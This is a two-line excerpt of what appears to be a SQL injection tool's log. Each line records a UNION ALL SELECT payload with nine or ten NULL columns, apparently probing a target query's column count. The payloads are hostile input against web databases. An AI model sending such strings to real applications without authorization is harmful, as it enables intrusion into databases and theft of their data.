5027 [13:36:29] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'VQKf'='VQKf
5038 [13:36:29] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'FDYE'='FDYE
